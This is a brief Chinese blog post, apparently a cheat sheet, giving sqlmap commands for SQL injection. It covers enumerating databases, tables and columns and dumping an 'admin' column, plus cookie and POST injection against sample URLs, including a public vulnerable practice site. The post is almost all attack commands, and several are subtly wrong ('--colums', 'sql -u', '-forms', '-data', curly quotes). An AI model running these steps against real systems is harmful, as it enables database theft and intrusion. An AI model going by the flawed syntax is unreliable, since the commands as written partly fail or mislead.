sqlmap的注入方式

第一种:普通的注入方式

第一步:首先进行 -u操作,比如:-u "http://www.target.com/vuln.php?id=1"

第二步:进行-D暴库操作 sqlmap -u "http://www.target.com/vuln.php?id=1" --dbs

第三步:进行-T暴表操作 sqlmap -u "http://www.target.com/vuln.php?id=1" -D user --tables

第四步:进行--colums进行暴字段 sqlmap -u "http://www.target.com/vuln.php?id=1" -D user -T use --colums

第五步:进行--dump暴字段内容-sqlmap -u "http://www.target.com/vuln.php?id=1" -D user -T use -C admin --dump

第二种:通过使用cooki进行注入

sqlmap “http://127.0.0.1/base.php” –cookie “id=1″  –dbs –level 2

第三种:POST注入

几种注入方式 

1:./sqlmap.py -r search-test.txt -p tfUPass //通过工具抓一个表单post的包然后将包保存为txt文本的形式-r 指定文本,-p指定参数 

2:sqlmap -u http://testasp.vulnweb.com/Login.asp -forms //sqlmap会自己去在网页找到表单并进行注入 

3:sql -u http://testasp.vulnweb.com/Login.asp -data "tfUName=1&tfUPass=1"//-data指定参数注解 //-u指定链接




你可能感兴趣的:(网络安全)